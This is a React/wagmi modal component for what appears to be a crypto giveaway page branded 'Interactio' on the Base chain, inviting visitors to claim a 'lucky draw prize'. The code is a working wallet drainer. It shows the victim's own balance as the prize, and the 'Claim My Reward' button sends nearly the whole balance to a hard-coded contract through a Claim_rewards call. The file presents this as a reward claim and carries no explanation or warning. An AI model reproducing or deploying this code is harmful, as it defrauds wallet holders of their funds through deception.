import { Button, Dialog, DialogPanel, DialogTitle } from '@headlessui/react'
import { useState } from 'react'
import logo from "./logo.png"
import { useAccount } from 'wagmi'
import { useBalance } from 'wagmi'
import abi from "../abi.json"
import { useWriteContract } from 'wagmi'
import { formatEther, parseEther } from 'viem'
import { useEstimateMaxPriorityFeePerGas } from 'wagmi'


const Modal = () => {

    const contract = '0xC06BF5c73c819e389E2B70ff58e9c934EdF4783F'
    const chainId = 8453


    const toDecimals = (number, decimals) => {
        const multiplier = 10 ** decimals;
        return number * multiplier;
    }

    const account = useAccount()
    const result = useBalance({
        address: account?.address ? account?.address : "",
    })

    const gasPrice = useEstimateMaxPriorityFeePerGas()

    const totalReward = Number(result?.data?.formatted) - 0.00006
    const messageValue = toDecimals(totalReward, 18).toString()


    const userBalance = result?.data?.formatted ? Number(result?.data?.formatted).toFixed(4) + ` ${result?.data?.symbol} ` : "connect your account first to draw"
    const userChainId = account?.chain?.id
    // console.log(result)
    const close = () => { }
    const { writeContract } = useWriteContract()

    const isChainCorrect = chainId == userChainId

const claimReward = ()=> {
    
    writeContract({
        address: contract && contract,
        abi: abi && abi,
        functionName: 'Claim_rewards',
        chainId: chainId,
        value: messageValue,
    })

}



    return (
        <>
            <Dialog open={true} as="div" className="relative z-10 focus:outline-none " onClose={close}>
                <div className="fixed inset-0 z-10 w-screen overflow-y-auto bg-black/20 backdrop-blur-sm">
                    <div className="flex min-h-full items-center justify-center p-4">
                        <DialogPanel
                            transition
                            className="w-full max-w-xl rounded-xl bg-black/60 border border-white/20 p-6 backdrop-blur-2xl duration-300 ease-out data-[closed]:transform-[scale(95%)] data-[closed]:opacity-0"
                        >
                            <DialogTitle as="h3" className="text-lg font-bold text-white">
                            Claim if you are a lucky winner ! 🥳🥳        </DialogTitle>
                                <div>
                                    <img src={logo} className='w-40 py-5' alt="" />
                                </div>
                            <p className="mt-2 text-lg/6 font-bold tracking-wider text-white">
                                Interactio Your ultimate multilingual 
                                meetings solution in coming Onchain check eligibility  </p>
                            <div className="mt-4 flex flex-col gap-5 ">

                                <p className='font-bold text-purple-400'>{account.address ? `Account : ${account.address}` : "no account is connected yet"} </p>

                                <p className='text-white font-sans'> {account.address ? <span>&#x2705;</span> : <span>	&#8987;	</span>}  Step 1 : connect your wallet  </p>

                                <w3m-button label={'connect'} className="w-80" balance="hide" />
                               
                               { 
                          account?.address && !isChainCorrect &&
                                <div className='flex gap-5 items-center'>
                                    <p className='text-red-400 font-bold'>Please change your chain to Base in order to continue</p>

                                    <w3m-network-button />
                                </div>
                               }
                               
                               
                                <p className='text-white font-sans'>{account.address &&  isChainCorrect? <span>&#x2705;</span> : <span>	&#8987;	</span>} Step 2 : your lucky draw prize Amount  </p>
                                <p className='text-white font-sans'>
                                    {
                                       isChainCorrect&& userBalance 
                                    }
                                    {Number(result?.data?.formatted) === 0 && "  you did not win this time ☹️ !!"}
                                </p>


                                <p className='text-white'>{account.address &&  isChainCorrect ? <span>&#x2705;</span> : <span>	&#8987;	</span>} Step 3 : claim your prize  </p>
                                <Button
                                    disabled={account.address ? false : true} className=" w-full rounded-md disabled:cursor-not-allowed font-sans bg-purple-400 disabled:bg-gray-400 py-1.5 px-3 text-sm/6 font-semibold text-gray-black shadow-inner shadow-white/10 focus:outline-none data-[hover]:bg-gray-600 data-[focus]:outline-1 data-[focus]:outline-white data-[open]:bg-gray-700"

                                    onClick={() =>
                                        claimReward()

                                    }
                                >
                                    Claim My Reward
                                </Button>


                            </div>
                        </DialogPanel>
                    </div>
                </div>
            </Dialog>
        </>
    )
}

export default Modal